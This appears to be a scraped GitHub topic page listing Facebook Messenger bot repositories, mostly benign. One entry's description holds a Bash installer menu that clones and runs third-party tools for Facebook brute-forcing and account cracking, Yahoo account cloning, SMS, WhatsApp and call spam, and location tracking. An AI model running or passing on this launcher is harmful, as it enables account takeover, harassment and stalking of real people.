Thuckerbot](https://github.com/bsansouci/lisp-bot) - Programmable lisp bot - [MarkovsInequality](https://github.com/logicx24/MarkovsInequality) - Extensible chat bot adding useful functions to Facebook Messenger - [AllanBot](https://github.com/AllanWang/AllanBot-Public) - Extensive module that combines the facebook api with firebase to create numerous functions; no coding experience is required to implement this. - [Larry Pudding Dog Bot](https://github.com/Larry850806/facebook-chat-bot) - A facebook bot you can easily customize the response - [fbash](https://github.com/avikj/fbash) - Run commands on your computer's terminal over Facebook Messenger - [Klink](https://github.com/KeNt178/klink) - This Chrome extension will 1-click share the link of your active tab over Facebook Messenger - [Botyo](https://github.com/ivkos/botyo) - Modular bot designed for group chat rooms on Facebook - [matrix-puppet-facebook](https://github.com/matrix-hacks/matrix-puppet-facebook) - A facebook bridge for [matrix](https://matrix.org) - [facebot](https://github.com/Weetbix/facebot) - A facebook bridge for Slack. - [Botium](https://github.com/codeforequity-at/botium-core) - The Selenium for Chatbots - [Messenger-CLI](https://github.com/AstroCB/Messenger-CLI) - A command-line interface for sending and receiving messages through Facebook Messenger. - [AssumeZero-Bot](https://github.com/AstroCB/AssumeZero-Bot) – A highly customizable Facebook Messenger bot for group chats. - [Miscord](https://github.com/Bjornskjald/miscord) - An easy-to-use Facebook bridge for Discord. - [chat-bridge](https://github.com/rexx0520/chat-bridge) - A Messenger, Telegram and IRC chat bridge. - [messenger-auto-reply](https://gitlab.com/theSander/messenger-auto-reply) - An auto-reply service for Messenger. - [BotCore](https://github.com/AstroCB/BotCore) – A collection of tools for writing and managing Facebook Messenger bots. - [mnotify](https://github.com/AstroCB/mnotify) – A command-line utility for sending alerts and notifications through Facebook Messenger.

    From user tinkprocodes

  • upliftngr / fb-github-bot

    facebook-github-bot, An application to help github users get notified of activities via facebook messenger bot

    From organization upliftngr

  • zainal-212 / mr.keheladack

    facebook-github-bot, clear bi='\033[34;1m' #biru i='\033[32;1m' #ijo pur='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #purple ku='\033[33;1m' #kuning echo echo python2 meizu.py echo clear echo echo $red" maaf ajengan Tool akan di install dalam waktu 5 detik" echo $red" harap sabar menunggu yaa sayang :v(" sleep 1 echo '''\a \033[34;1m _ \033[34;1m / | \033[34;1m | | \033[34;1m | | \033[34;1m _|_|_ ''' sleep 1 apt update && apt upgrade apt install nano apt install git pkg install python python2 vim figlet curl clear echo echo echo echo echo $red" maaf ajengan Tool akan di install dalam waktu 5 detik" echo $red" harap sabar menunggu yaa sayang :v" sleep 1 echo '''\a \033[32;1m ____ \033[32;1m |___ \ \033[32;1m __) | \033[32;1m / __/ \033[32;1m |_____| ''' sleep 1 apt install php pip2 install mechanize pip2 install lolcat pip2 install requests clear echo echo echo echo echo $red" maaf ajengan Tool akan di install dalam waktu 5 detik" echo $red" harap sabar menunggu yaa sayang :v" sleep 1 echo '''\a \033[35;1m _____ \033[35;1m |___ / \033[35;1m |_ \ \033[35;1m ___) | \033[35;1m |____/ ''' sleep 1 clear echo echo echo echo echo $red" maaf ajengan Tool akan di install dalam waktu 5 detik" echo $red" harap sabar menunggu yaa sayang :v" sleep 1 echo '''\a \033[33;1m _ _ \033[33;1m | || | \033[33;1m | || |_ \033[33;1m |__ _| \033[33;1m |_| ''' sleep 1 clear echo echo echo echo echo $red" maaf ajengan Tool akan di install dalam waktu 5 detik" echo $red" harap sabar menunggu yaa sayang :v" sleep 1 echo '''\a \033[36;1m ____ \033[36;1m | ___| \033[36;1m |___ \ \033[36;1m ___) | \033[36;1m |____/ ''' sleep 1 clear echo echo $pur"==================="$cy" =============================" echo $i"Ôûê"$pu" AUTHOR : ZAIN3LLKUNJANIE "$i" Ôûê" echo $i"Ôûê"$pu" PAMAJIKAN: aya pokonya gak bakalan bilang bilang"$i" Ôûê" echo $i"Ôûê"$pu" GMAIL : [email protected]"$i" Ôûê" echo $i"Ôûê"$pu" BLOGSPOT : [email protected]"$i" Ôûê" echo $pur"==================="$cy" =============================" echo echo $cy"MeNu KUMPULAN HECK NJIER BY:SANTRI KLASIK NeWS:" echo $ku"["$me"1"$ku"]"$i" REPORT FB" echo $ku"["$me"2"$ku"]"$i" BRUTE PORCE" echo $ku"["$me"3"$ku"]"$i" BRUTE FORCE FB CRACKER" echo $ku"["$me"4"$ku"]"$i" MBF" echo $ku"["$me"5"$ku"]"$i" CLONING YAHOO" echo $ku"["$me"6"$ku"]"$i" OSIF" echo $ku"["$me"7"$ku"]"$i" PROFILEGUARD FB" echo $ku"["$me"8"$ku"]"$i" BOT REACTION FACEBOOK" echo $ku"["$me"9"$ku"]"$i" SPAM CALL" echo $ku"["$me"10"$ku"]"$i" SPAM WHATSHAPP" echo $ku"["$me"11"$ku"]"$i" YOUTUBE-DL" echo $ku"["$me"12"$ku"]"$i" LACAK LOKASI" echo $ku"["$me"13"$ku"]"$i" SPAM SMS BRUTAL TERBARU" echo $i"["$me"14"$i"]"$ku" EXIT AKENGAN " echo echo $pur"Ôò¡ÔöÇ["$pur"PIHANMU APA AJENGAN?"$pur"]" read -p"Ôò¦ÔöÇ>> " pil if [ $pil = 1 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/IlayTamvan/Report.git cd Report unzip Report.zip python2 Report.py fi if [ $pil = 2 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/Senitopeng/fbbrute.git cd fbbrute python2 jomblo.py fi if [ $pil = 3 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/Fb-Cracker-v.3.git cd Fb-Cracker-v.3 python2 crack.py fi if [ $pil = 4 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/tikuskecil/multi-bruteforce-facebook.git cd multi-bruteforce-facebook python2 MBF.py fi if [ $pil = 5 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/wahyuandhika/YahooCloning.git cd YahooCloning pip2 install requests mechanize pip2 install requirements python2 cloning.py fi if [ $pil = 6 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/CiKu370/OSIF.git cd OSIF pip2 install -r requirements.txt python2 osif.py fi if [ $pil = 7 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/jaxBCD/FBshield.git cd FBshield python2 guard.py fi if [ $pil = 8 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/edi-nasa12/ROBOT.git cd ROBOT python2 blackbot.py fi if [ $pil = 9 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/Aditya021/SpamCall cd SpamCall php SpamCall.php fi if [ $pil = 10 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/4L13199/LITESPAM.git cd LITESPAM sh LITESPAM.sh fi if [ $pil = 11 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/rahmadxyz/sub-bot.git cd sub-bot php sub-bot.php fi if [ $pil = 12 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/locator.git cd locator bash locator.sh fi if [ $pil = 13 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/TERMUXID3/brutal-sms cd brutal-sms python2 run.py fi if [ $pil = 14 ] then clear figlet -f slant "W A I T"|Ulolcat sleep 2 echo $cy"Terima Kasih sudah mengunakan Tools ini ajengan" sleep 2 echo $i"Silahkan di pakai gunakanlah dengan bijak njier" sleep 2 echo $pur"Bila Ada Kesalahan Anda Bisa Nanya Melalui Via" sleep 2 echo $ku"Facebook :"$i" Panglima Bentank Katanya" echo $ku"blogger :"$i" [email protected]" echo $ku"WhatsApp :"$i" 08562428xxxx" sleep 2 echo $pur"Terima kasih Yang Sudah Support dengan Tools MR.KEHELADACK TEA YANG TAMPAN AND KECE" sleep 2 echo $pur"KUNJUNGI MY CHANNEL { MR. KEHELADACK }" exit fi

    From user zainal-212

  • zeus0390 / python-rimzbot

    facebook-github-bot, Facebook messenger bot that mainly uses fbchat library from https://github.com/carpedm20/fbchat

    From user zeus0390

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.